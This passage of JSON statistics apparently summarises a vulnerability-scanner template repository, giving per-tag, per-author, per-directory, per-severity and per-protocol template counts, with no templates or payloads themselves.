},{"name":"dompdf","count":1},{"name":"expn","count":1},{"name":"bruteforce","count":1},{"name":"qcubed","count":1},{"name":"perl","count":1},{"name":"gogs","count":1},{"name":"fiori","count":1},{"name":"zeroshell","count":1},{"name":"openstack","count":1},{"name":"pgadmin","count":1},{"name":"postgres","count":1},{"name":"74cms","count":1},{"name":"zarafa","count":1},{"name":"wavlink","count":1},{"name":"fortigate","count":1},{"name":"sidekiq","count":1},{"name":"xiuno","count":1},{"name":"jitsi","count":1},{"name":"rubedo","count":1}],"authors":[{"name":"pikpikcu","count":234},{"name":"dhiyaneshdk","count":234},{"name":"pdteam","count":191},{"name":"daffainfo","count":128},{"name":"geeknik","count":127},{"name":"dwisiswant0","count":127},{"name":"gy741","count":62},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":40},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":17},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":10},{"name":"hackergautam","count":9},{"name":"r3dg33k","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"nadino","count":8},{"name":"iamthefrogy","count":8},{"name":"dr_set","count":7},{"name":"randomstr1ng","count":7},{"name":"emadshanab","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"techryptic (@tech)","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"meme-lord","count":5},{"name":"elsfa7110","count":4},{"name":"nodauf","count":4},{"name":"e_schultze_","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"fyoorer","count":3},{"name":"binaryfigments","count":3},{"name":"z3bd","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"mavericknerd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"tess","count":3},{"name":"_generic_human_","count":3},{"name":"shifacyclewala","count":3},{"name":"thomas_from_offensity","count":3},{"name":"0w4ys","count":3},{"name":"joeldeleep","count":2},{"name":"unstabl3","count":2},{"name":"x1m_martijn","count":2},{"name":"foulenzer","count":2},{"name":"davidmckennirey","count":2},{"name":"gevakun","count":2},{"name":"fabaff","count":2},{"name":"pxmme1337","count":2},{"name":"0xprial","count":2},{"name":"sushantkamble","count":2},{"name":"random-robbie","count":2},{"name":"0xsapra","count":2},{"name":"moritz nentwig","count":2},{"name":"lotusdll","count":2},{"name":"randomrobbie","count":2},{"name":"kiblyn11","count":2},{"name":"incogbyte","count":2},{"name":"nkxxkn","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"ree4pwn","count":2},{"name":"koti2","count":2},{"name":"ehsahil","count":2},{"name":"bing0o","count":2},{"name":"0xrudra","count":2},{"name":"bp0lr","count":2},{"name":"swissky","count":2},{"name":"dheerajmadhukar","count":2},{"name":"manas_harsh","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"lu4nx","count":2},{"name":"zomsop82","count":2},{"name":"hahwul","count":2},{"name":"bsysop","count":2},{"name":"0xcrypto","count":2},{"name":"0xelkomy","count":2},{"name":"amsda","count":2},{"name":"hetroublemakr","count":2},{"name":"vavkamil","count":2},{"name":"alifathi-h1","count":2},{"name":"w4cky_","count":2},{"name":"gal nagli","count":2},{"name":"c3l3si4n","count":1},{"name":"ldionmarcil","count":1},{"name":"thevillagehacker","count":1},{"name":"divya_mudgal","count":1},{"name":"kabirsuda","count":1},{"name":"_c0wb0y_","count":1},{"name":"akash.c","count":1},{"name":"ahmed sherif","count":1},{"name":"furkansenan","count":1},{"name":"ajaysenr","count":1},{"name":"retr0","count":1},{"name":"mohammedsaneem","count":1},{"name":"ringo","count":1},{"name":"becivells","count":1},{"name":"d0rkerdevil","count":1},{"name":"jteles","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"luskabol","count":1},{"name":"vzamanillo","count":1},{"name":"fmunozs","count":1},{"name":"nytr0gen","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"mhdsamx","count":1},{"name":"ipanda","count":1},{"name":"fopina","count":1},{"name":"absshax","count":1},{"name":"berkdusunur","count":1},{"name":"andysvints","count":1},{"name":"akshansh","count":1},{"name":"notsoevilweasel","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"0xtavian","count":1},{"name":"streetofhackerr007","count":1},{"name":"sicksec","count":1},{"name":"shifacyclewla","count":1},{"name":"whynotke","count":1},{"name":"elmahdi","count":1},{"name":"co0nan","count":1},{"name":"hanlaomo","count":1},{"name":"sullo","count":1},{"name":"alph4byt3","count":1},{"name":"noamrathaus","count":1},{"name":"bernardofsr","count":1},{"name":"b4uh0lz","count":1},{"name":"j33n1k4","count":1},{"name":"luci","count":1},{"name":"pdp","count":1},{"name":"52971","count":1},{"name":"patralos","count":1},{"name":"undefl0w","count":1},{"name":"petruknisme","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"jeya seelan","count":1},{"name":"bjhulst","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"0ut0fb4nd","count":1},{"name":"andirrahmani1","count":1},{"name":"wabafet","count":1},{"name":"un-fmunozs","count":1},{"name":"zandros0","count":1},{"name":"ooooooo_q","count":1},{"name":"tirtha_mandal","count":1},{"name":"huowuzhao","count":1},{"name":"revblock","count":1},{"name":"omarkurt","count":1},{"name":"sshell","count":1},{"name":"johnjhacking","count":1},{"name":"mubassirpatel","count":1},{"name":"adrianmf","count":1},{"name":"elder tao","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"aresx","count":1},{"name":"bad5ect0r","count":1},{"name":"bolli95","count":1},{"name":"regala_","count":1},{"name":"0h1in9e","count":1},{"name":"iampritam","count":1},{"name":"shelld3v","count":1},{"name":"kareemse1im","count":1},{"name":"pratik khalane","count":1},{"name":"daviey","count":1},{"name":"arcc","count":1},{"name":"flag007","count":1},{"name":"@dwisiswant0","count":1},{"name":"r3naissance","count":1},{"name":"taielab","count":1},{"name":"gboddin","count":1},{"name":"th3.d1p4k","count":1},{"name":"smaranchand","count":1},{"name":"qlkwej","count":1},{"name":"johnk3r","count":1},{"name":"tim_koopmans","count":1},{"name":"yavolo","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"deena","count":1},{"name":"micha3lb3n","count":1},{"name":"philippdelteil","count":1},{"name":"ilovebinbash","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"apt-mirror","count":1},{"name":"shreyapohekar","count":1},{"name":"sickwell","count":1},{"name":"sy3omda","count":1},{"name":"zhenwarx","count":1},{"name":"naglinagli","count":1},{"name":"mah3sec_","count":1},{"name":"dawid czarnecki","count":1},{"name":"schniggie","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"affix","count":1},{"name":"chron0x","count":1},{"name":"remonsec","count":1},{"name":"ohlinge","count":1},{"name":"willd96","count":1},{"name":"_darrenmartyn","count":1},{"name":"rodnt","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"cookiehanhoan","count":1},{"name":"abison_binoy","count":1},{"name":"s1r1u5_","count":1},{"name":"geraldino2","count":1},{"name":"manuelbua","count":1},{"name":"udyz","count":1},{"name":"b0yd","count":1},{"name":"me9187","count":1},{"name":"thezakman","count":1},{"name":"kurohost","count":1},{"name":"blckraven","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"pudsec","count":1},{"name":"rtcms","count":1},{"name":"makyotox","count":1},{"name":"its0x08","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"0xteles","count":1},{"name":"_harleo","count":1},{"name":"alex","count":1},{"name":"dogasantos","count":1},{"name":"defr0ggy","count":1},{"name":"juicypotato1","count":1},{"name":"0xrod","count":1},{"name":"mass0ma","count":1},{"name":"idealphase","count":1},{"name":"alperenkesk","count":1},{"name":"soyelmago","count":1},{"name":"yashanand155","count":1},{"name":"mesaglio","count":1},{"name":"rojanrijal","count":1},{"name":"hakluke","count":1},{"name":"raesene","count":1},{"name":"knassar702","count":1},{"name":"yashgoti","count":1}],"directory":[{"name":"cves","count":583},{"name":"vulnerabilities","count":262},{"name":"exposed-panels","count":216},{"name":"exposures","count":174},{"name":"technologies","count":158},{"name":"misconfiguration","count":124},{"name":"takeovers","count":70},{"name":"default-logins","count":50},{"name":"file","count":46},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":8},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":577},{"name":"high","count":457},{"name":"medium","count":385},{"name":"critical","count":218},{"name":"low","count":156}],"types":[{"name":"http","count":1696},{"name":"file","count":46},{"name":"network","count":35},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":590},{"name":"panel","count":219},{"name":"xss","count":215},{"name":"wordpress","count":201},{"name":"exposure","count":196},{"name":"rce","count":187},{"name":"lfi","count":176},{"name":"cve2020","count":155},{"name":"wp-plugin","count":136},{"name":"tech","count":101},{"name":"cve2021","count":96},{"name":"config","count":91},{"name":"cve2019","count":87},{"name":"cve2018","count":76},{"name":"takeover","count":73},{"name":"","count":65},{"name":"token","count":64},{"name":"apache","count":64},{"name":"default-login","count":55},{"name":"iot","count":48},{"name":"cve2017","count":47},{"name":"file","count":46},{"name":"oob","count":44},{"name":"unauth","count":42},{"name":"sqli","count":35},{"name":"network","count":35},{"name":"cve2016","count":32},{"name":"ssrf","count":31},{"name":"workflow","count":30},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"redirect","count":25},{"name":"listing","count":24},{"name":"aem","count":19},{"name":"generic","count":19},{"name":"sap","count":18},{"name":"cisco","count":18},{"name":"cve2015","count":18},{"name":"disclosure","count":17},{"name":"springboot","count":15},{"name":"joomla","count":15},{"name":"cve2014","count":15},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"struts","count":13},{"name":"cve2011","count":13},{"name":"misconfig","count":13},{"name":"android","count":13},{"name":"auth-bypass","count":13},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"php","count":11},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"fuzz","count":11},{"name":"devops","count":11},{"name":"router","count":11},{"name":"magento","count":9},{"name":"cve2010","count":9},{"name":"ftp","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"airflow","count":8},{"name":"xxe","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"cnvd","count":8},{"name":"cve2009","count":7},{"name":"login","count":7},{"name":"scada","count":7},{"name":"vmware","count":7},{"name":"nginx","count":7},{"name":"rconfig","count":6},{"name":"backup","count":6},{"name":"api","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"cms","count":6},{"name":"google","count":6},{"name":"jetty","count":6},{"name":"coldfusion","count":6},{"name":"dell","count":6},{"name":"solr","count":6},{"name":"java","count":5},{"name":"django","count":5},{"name":"phpmyadmin","count":5},{"name":"ibm","count":5},{"name":"wp-theme","count":5},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"netgear","count":5},{"name":"files","count":5},{"name":"headless","count":5},{"name":"drupal","count":5},{"name":"fileupload","count":5},{"name":"ssti","count":5},{"name":"lucee","count":5},{"name":"confluence","count":5},{"name":"elastic","count":4},{"name":"solarwinds","count":4},{"name":"asp","count":4},{"name":"deserialization","count":4},{"name":"webserver","count":4},{"name":"artifactory","count":4},{"name":"jolokia","count":4},{"name":"crlf","count":4},{"name":"thinkphp","count":4},{"name":"zimbra","count":4},{"name":"samsung","count":4},{"name":"tomcat","count":4},{"name":"vpn","count":4},{"name":"traversal","count":4},{"name":"thinkcmf","count":4},{"name":"magmi","count":4},{"name":"hongdian","count":4},{"name":"docker","count":4},{"name":"moodle","count":4},{"name":"buffalo","count":4},{"name":"nodejs","count":4},{"name":"firmware","count":4},{"name":"windows","count":4},{"name":"cve2008","count":4},{"name":"nacos","count":3},{"name":"caucho","count":3},{"name":"git","count":3},{"name":"slack","count":3},{"name":"nosqli","count":3},{"name":"grafana","count":3},{"name":"symfony","count":3},{"name":"itop","count":3},{"name":"zhiyuan","count":3},{"name":"fpd","count":3},{"name":"microstrategy","count":3},{"name":"vbulletin","count":3},{"name":"log","count":3},{"name":"ssh","count":3},{"name":"amazon","count":3},{"name":"tikiwiki","count":3},{"name":"ebs","count":3},{"name":"opensis","count":3},{"name":"bitrix","count":3},{"name":"zabbix","count":3},{"name":"nexus","count":3},{"name":"printer","count":3},{"name":"targa","count":3},{"name":"r-seenet","count":3},{"name":"fanruan","count":3},{"name":"springcloud","count":3},{"name":"mongodb","count":3},{"name":"backups","count":3},{"name":"terramaster","count":3},{"name":"kafka","count":3},{"name":"openssh","count":3},{"name":"resin","count":3},{"name":"microsoft","count":3},{"name":"httpd","count":3},{"name":"wso2","count":3},{"name":"lfr","count":3},{"name":"kevinlab","count":3},{"name":"hp","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"globalprotect","count":2},{"name":"guacamole","count":2},{"name":"telerik","count":2},{"name":"vrealize","count":2},{"name":"maian","count":2},{"name":"seeyon","count":2},{"name":"phpcollab","count":2},{"name":"openam","count":2},{"name":"smb","count":2},{"name":"pega","count":2},{"name":"akamai","count":2},{"name":"mida","count":2},{"name":"activemq","count":2},{"name":"horde","count":2},{"name":"splunk","count":2},{"name":"sonarqube","count":2},{"name":"dolibarr","count":2},{"name":"status","count":2},{"name":"waf","count":2},{"name":"backdoor","count":2},{"name":"voipmonitor","count":2},{"name":"wordfence","count":2},{"name":"kentico","count":2},{"name":"glassfish","count":2},{"name":"linkerd","count":2},{"name":"natshell","count":2},{"name":"emerge","count":2},{"name":"jellyfin","count":2},{"name":"chiyu","count":2},{"name":"oauth","count":2},{"name":"avantfax","count":2},{"name":"leak","count":2},{"name":"nagios","count":2},{"name":"service","count":2},{"name":"idrac","count":2},{"name":"webcam","count":2},{"name":"rockethchat","count":2},{"name":"icewarp","count":2},{"name":"ucmdb","count":2},{"name":"nextjs","count":2},{"name":"prometheus","count":2},{"name":"flir","count":2},{"name":"spark","count":2},{"name":"frp","count":2},{"name":"plesk","count":2},{"name":"couchdb","count":2},{"name":"chamilo","count":2},{"name":"showdoc","count":2},{"name":"jboss","count":2},{"name":"intrusive","count":2},{"name":"sonicwall","count":2},{"name":"paloalto","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"azure","count":2},{"name":"grav","count":2},{"name":"huawei","count":2},{"name":"strapi","count":2},{"name":"igs","count":2},{"name":"bigip","count":2},{"name":"proxy","count":2},{"name":"shellshock","count":2},{"name":"saltstack","count":2},{"name":"keycloak","count":2},{"name":"github","count":2},{"name":"openfire","count":2},{"name":"jeedom","count":2},{"name":"sharepoint","count":2},{"name":"dos","count":2},{"name":"kibana","count":2},{"name":"exchange","count":2},{"name":"hjtcloud","count":2},{"name":"jsf","count":2},{"name":"odoo","count":2},{"name":"injection","count":2},{"name":"fortios","count":2},{"name":"akkadian","count":2},{"name":"hpe","count":2},{"name":"xxljob","count":2},{"name":"cve2007","count":2},{"name":"smtp","count":2},{"name":"mail","count":2},{"name":"rstudio","count":2},{"name":"trixbox","count":2},{"name":"cache","count":2},{"name":"hasura","count":2},{"name":"yapi","count":2},{"name":"rockmongo","count":2},{"name":"cve2005","count":2},{"name":"bigbluebutton","count":1},{"name":"glances","count":1},{"name":"gridx","count":1},{"name":"wavlink","count":1},{"name":"plc","count":1},{"name":"uwsgi","count":1},{"name":"xunchi","count":1},{"name":"spf","count":1},{"name":"mirai","count":1},{"name":"exposures","count":1},{"name":"wifisky","count":1},{"name":"qvisdvr","count":1},{"name":"wildfly","count":1},{"name":"keenetic","count":1},{"name":"opm","count":1},{"name":"alibaba","count":1},{"name":"ambari","count":1},{"name":"sidekiq","count":1},{"name":"spectracom","count":1},{"name":"svn","count":1},{"name":"visionhub","count":1},{"name":"zarafa","count":1},{"name":"fortilogger","count":1},{"name":"enumeration","count":1},{"name":"chinaunicom","count":1},{"name":"phpunit","count":1},{"name":"cherokee","count":1},{"name":"getsimple","count":1},{"name":"acexy","count":1},{"name":"parentlink","count":1},{"name":"sar2html","count":1},{"name":"webui","count":1},{"name":"openemr","count":1},{"name":"emby","count":1},{"name":"circontrorl","count":1},{"name":"yealink","count":1},{"name":"opencast","count":1},{"name":"clockwatch","count":1},{"name":"mpsec","count":1},{"name":"cors","count":1},{"name":"oneblog","count":1},{"name":"tensorflow","count":1},{"name":"linkedin","count":1},{"name":"dotnetnuke","count":1},{"name":"mediumish","count":1},{"name":"cloudinary","count":1},{"name":"redcap","count":1},{"name":"cobub","count":1},{"name":"jeewms","count":1},{"name":"sangfor","count":1},{"name":"bookstack","count":1},{"name":"hiboss","count":1},{"name":"mariadb","count":1},{"name":"ilo4","count":1},{"name":"nomad","count":1},{"name":"lancom","count":1},{"name":"cacti","count":1},{"name":"nexusdb","count":1},{"name":"fortiweb","count":1},{"name":"rubedo","count":1},{"name":"tpshop","count":1},{"name":"azkaban","count":1},{"name":"iptime","count":1},{"name":"clink-office","count":1},{"name":"accela","count":1},{"name":"alertmanager","count":1},{"name":"csod","count":1},{"name":"codemeter","count":1},{"name":"gitlist","count":1},{"name":"mcafee","count":1},{"name":"optiLink","count":1},{"name":"tongda","count":1},{"name":"mailchimp","count":1},{"name":"krweb","count":1},{"name":"api-manager","count":1},{"name":"node","count":1},{"name":"aura","count":1},{"name":"netrc","count":1},{"name":"k8s","count":1},{"name":"mongo","count":1},{"name":"sureline","count":1},{"name":"extractor","count":1},{"name":"manageengine","count":1},{"name":"h3c-imc","count":1},{"name":"rhymix","count":1},{"name":"octobercms","count":1},{"name":"redwood","count":1},{"name":"faraday","count":1},{"name":"calendarix","count":1},{"name":"embedthis","count":1},{"name":"mobileiron","count":1},{"name":"tika","count":1},{"name":"centos","count":1},{"name":"aspnuke","count":1},{"name":"openerp","count":1},{"name":"seacms","count":1},{"name":"nc2","count":1},{"name":"perl","count":1},{"name":"floc","count":1},{"name":"clusterengine","count":1},{"name":"salesforce","count":1},{"name":"wazuh","count":1},{"name":"memcached","count":1},{"name":"viewpoint","count":1},{"name":"lighttpd","count":1},{"name":"checkpoint","count":1},{"name":"varnish","count":1},{"name":"razor","count":1},{"name":"linux","count":1},{"name":"expressjs","count":1},{"name":"klog","count":1},{"name":"pgadmin","count":1},{"name":"ricoh","count":1},{"name":"servicedesk","count":1},{"name":"ecom","count":1},{"name":"hortonworks","count":1},{"name":"tapestry","count":1},{"name":"sprintful","count":1},{"name":"fuelcms","count":1},{"name":"ueditor","count":1},{"name":"qdpm","count":1},{"name":"gotmls","count":1},{"name":"sgp","count":1},{"name":"portainer","count":1},{"name":"skywalking","count":1},{"name":"thinkadmin","count":1},{"name":"rmi","count":1},{"name":"weiphp","count":1},{"name":"rdp","count":1},{"name":"sourcebans","count":1},{"name":"wondercms","count":1},{"name":"firebase","count":1},{"name":"rfi","count":1},{"name":"smartsense","count":1},{"name":"magicflow","count":1},{"name":"zenario","count":1},{"name":"xvr","count":1},{"name":"javascript","count":1},{"name":"rabbitmq","count":1},{"name":"lg-nas","count":1},{"name":"db","count":1},{"name":"scimono","count":1},{"name":"avalanche","count":1},{"name":"clave","count":1},{"name":"auth","count":1},{"name":"flash","count":1},{"name":"wing-ftp","count":1},{"name":"rujjie","count":1},{"name":"scs","count":1},{"name":"panos","count":1},{"name":"vnc","count":1},{"name":"moinmoin","count":1},{"name":"lansweeper","count":1},{"name":"zend","count":1},{"name":"vsftpd","count":1},{"name":"darkstat","count":1},{"name":"flink","count":1},{"name":"concrete","count":1},{"name":"zte","count":1},{"name":"cofax","count":1},{"name":"resourcespace","count":1},{"name":"ruby","count":1},{"name":"cgi","count":1},{"name":"ntopng","count":1},{"name":"gogs","count":1},{"name":"sarg","count":1},{"name":"2014","count":1},{"name":"alerta","count":1},{"name":"geddy","count":1},{"name":"phalcon","count":1},{"name":"ems","count":1},{"name":"octoprint","count":1},{"name":"monitorix","count":1},{"name":"bullwark","count":1},{"name":"landray","count":1},{"name":"apos","count":1},{"name":"discord","count":1},{"name":"tileserver","count":1},{"name":"subrion","count":1},{"name":"blue-ocean","count":1},{"name":"centreon","count":1},{"name":"gespage","count":1},{"name":"xml","count":1},{"name":"websvn","count":1},{"name":"logontracer","count":1},{"name":"jmx","count":1},{"name":"powercreator","count":1},{"name":"74cms","count":1},{"name":"influxdb","count":1},{"name":"timesheet","count":1},{"name":"b2evolution","count":1},{"name":"redis","count":1},{"name":"xmlchart","count":1},{"name":"wiki","count":1},{"name":"sage","count":1},{"name":"exacqvision","count":1},{"name":"linksys","count":1},{"name":"rmc","count":1},{"name":"plugin","count":1},{"name":"bash","count":1},{"name":"stem","count":1},{"name":"trilithic","count":1},{"name":"webmin","count":1},{"name":"pulsesecure","count":1},{"name":"xiuno","count":1},{"name":"expn","count":1},{"name":"ruckus","count":1},{"name":"jitsi","count":1},{"name":"beanshell","count":1},{"name":"mysql","count":1},{"name":"ulterius","count":1},{"name":"ssltls","count":1},{"name":"eprints","count":1},{"name":"myucms","count":1},{"name":"javamelody","count":1},{"name":"zeroshell","count":1},{"name":"fortinet","count":1},{"name":"node-red-dashboard","count":1},{"name":"xdcms","count":1},{"name":"nette","count":1},{"name":"sceditor","count":1},{"name":"sentry","count":1},{"name":"nps","count":1},{"name":"primetek","count":1},{"name":"wamp","count":1},{"name":"webadmin","count":1},{"name":"jfrog","count":1},{"name":"netis","count":1},{"name":"postmessage","count":1},{"name":"haproxy","count":1},{"name":"goahead","count":1},{"name":"bitly","count":1},{"name":"blind","count":1},{"name":"netdata","count":1},{"name":"cse","count":1},{"name":"fortigates","count":1},{"name":" default-login","count":1},{"name":"zyxel","count":1},{"name":"bolt","count":1},{"name":"cocoon","count":1},{"name":"aruba","count":1},{"name":"ioncube","count":1},{"name":"webftp","count":1},{"name":"adminer","count":1},{"name":"empirecms","count":1},{"name":"viewlinc","count":1},{"name":"plastic","count":1},{"name":"dompdf","count":1},{"name":"k8","count":1},{"name":"zcms","count":1},{"name":"esmtp","count":1},{"name":"cve2006","count":1},{"name":"yachtcontrol","count":1},{"name":"anchorcms","count":1},{"name":"twitter-server","count":1},{"name":"soar","count":1},{"name":"huijietong","count":1},{"name":"svnserve","count":1},{"name":"dotnet","count":1},{"name":"dvwa","count":1},{"name":"htmli","count":1},{"name":"kyan","count":1},{"name":"nuuo","count":1},{"name":"opensmtpd","count":1},{"name":"postgres","count":1},{"name":"labtech","count":1},{"name":"cerebro","count":1},{"name":"nedi","count":1},{"name":"codeigniter","count":1},{"name":"jenzabar","count":1},{"name":"froxlor","count":1},{"name":"springframework","count":1},{"name":"zookeeper","count":1},{"name":"javafaces","count":1},{"name":"metinfo","count":1},{"name":"pyramid","count":1},{"name":"kafdrop","count":1},{"name":"mdb","count":1},{"name":"harbor","count":1},{"name":"upload","count":1},{"name":"gloo","count":1},{"name":"fastapi","count":1},{"name":"default","count":1},{"name":"prestashop","count":1},{"name":"socomec","count":1},{"name":"favicon","count":1},{"name":"pacsone","count":1},{"name":"argussurveillance","count":1},{"name":"doh","count":1},{"name":"proftpd","count":1},{"name":"avtech","count":1},{"name":"nuxeo","count":1},{"name":"panabit","count":1},{"name":"qcubed","count":1},{"name":"tamronos","count":1},{"name":"bruteforce","count":1},{"name":"qsan","count":1},{"name":"st","count":1},{"name":"pippoint","count":1},{"name":"nweb2fax","count":1},{"name":"triconsole","count":1},{"name":"achecker","count":1},{"name":"servicenow","count":1},{"name":"dotclear","count":1},{"name":"acontent","count":1},{"name":"email","count":1},{"name":"glpi","count":1},{"name":"shopxo","count":1},{"name":"selea","count":1},{"name":"majordomo2","count":1},{"name":"spidercontrol","count":1},{"name":"openstack","count":1},{"name":"wooyun","count":1},{"name":"axis","count":1},{"name":"lutron","count":1},{"name":"office365","count":1},{"name":"diris","count":1},{"name":"solman","count":1},{"name":"turbocrm","count":1},{"name":"ganglia","count":1},{"name":"zm","count":1},{"name":"vscode","count":1},{"name":"chevereto","count":1},{"name":"openrestry","count":1},{"name":"monitorr","count":1},{"name":"spring","count":1},{"name":"jenkin","count":1},{"name":"redhat","count":1},{"name":"mautic","count":1},{"name":"camunda","count":1},{"name":"tenda","count":1},{"name":"opensns","count":1},{"name":"interlib","count":1},{"name":"duomicms","count":1},{"name":"biometrics","count":1},{"name":"totaljs","count":1},{"name":"sco","count":1},{"name":"acme","count":1},{"name":"liferay","count":1},{"name":"ssl","count":1},{"name":"yii","count":1},{"name":"realteo","count":1},{"name":"comodo","count":1},{"name":"xff","count":1},{"name":"landrayoa","count":1},{"name":"npm","count":1},{"name":"idemia","count":1},{"name":"apiman","count":1},{"name":"starttls","count":1},{"name":"appweb","count":1},{"name":"visualtools","count":1},{"name":"dom","count":1},{"name":"enum","count":1},{"name":"crm","count":1},{"name":"opentsdb","count":1},{"name":"emc","count":1},{"name":"openx","count":1},{"name":"feifeicms","count":1},{"name":"maccmsv10","count":1},{"name":"oscommerce","count":1},{"name":"tensorboard","count":1},{"name":"gateone","count":1},{"name":"hadoop","count":1},{"name":"circontrol","count":1},{"name":"etouch","count":1},{"name":"expose","count":1},{"name":"swagger","count":1},{"name":"phpinfo","count":1},{"name":"zzzcms","count":1},{"name":"eyou","count":1},{"name":"shopware","count":1},{"name":"druid","count":1},{"name":"kerbynet","count":1},{"name":"lanproxy","count":1},{"name":"traefik","count":1},{"name":"finereport","count":1},{"name":"webmodule-ee","count":1},{"name":"plone","count":1},{"name":"phpfusion","count":1},{"name":"drone","count":1},{"name":"moin","count":1},{"name":"upnp","count":1},{"name":"lotuscms","count":1},{"name":"saltapi","count":1},{"name":"woocomernce","count":1},{"name":"mongoshake","count":1},{"name":"livezilla","count":1},{"name":"fedora","count":1},{"name":"payara","count":1},{"name":"mantisbt","count":1},{"name":"grails","count":1},{"name":"csrf","count":1},{"name":"jquery","count":1},{"name":"erp-nc","count":1},{"name":"vsphere","count":1},{"name":"synnefo","count":1},{"name":"cloudflare","count":1},{"name":"kubeflow","count":1},{"name":"ns","count":1},{"name":"timeclock","count":1},{"name":"spip","count":1},{"name":"wavemaker","count":1},{"name":"geutebruck","count":1},{"name":"sqlite","count":1},{"name":"setup","count":1},{"name":"robomongo","count":1},{"name":"mantis","count":1},{"name":"ec2","count":1},{"name":"szhe","count":1},{"name":"discourse","count":1},{"name":"ewebs","count":1},{"name":"pagespeed","count":1},{"name":"dvr","count":1},{"name":"ghost","count":1},{"name":"fortigate","count":1},{"name":"netsweeper","count":1},{"name":"mara","count":1},{"name":"arl","count":1},{"name":"fastcgi","count":1},{"name":"bedita","count":1},{"name":"nordex","count":1},{"name":"tieline","count":1},{"name":"domxss","count":1},{"name":"commscope","count":1},{"name":"addpac","count":1},{"name":"jsp","count":1},{"name":"fiori","count":1},{"name":"heroku","count":1},{"name":"rsyncd","count":1},{"name":"jnoj","count":1},{"name":"kong","count":1},{"name":"sitecore","count":1},{"name":"episerver","count":1},{"name":"dnssec","count":1},{"name":"zmanda","count":1},{"name":"blackboard","count":1},{"name":"nsasg","count":1},{"name":"wuzhicms","count":1},{"name":"wmt","count":1}],"authors":[{"name":"dhiyaneshdk","count":239},{"name":"pikpikcu","count":237},{"name":"pdteam","count":194},{"name":"daffainfo","count":136},{"name":"dwisiswant0","count":128},{"name":"geeknik","count":127},{"name":"gy741","count":68},{"name":"madrobot","count":60},{"name":"princechaddha","count":53},{"name":"gaurang","count":42},{"name":"pussycat0x","count":41},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":23},{"name":"philippedelteil","count":17},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"r3dg33k","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"hackergautam","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"nadino","count":8},{"name":"that_juan_","count":8},{"name":"melbadry9","count":8},{"name":"harshbothra_","count":7},{"name":"randomstr1ng","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"techryptic 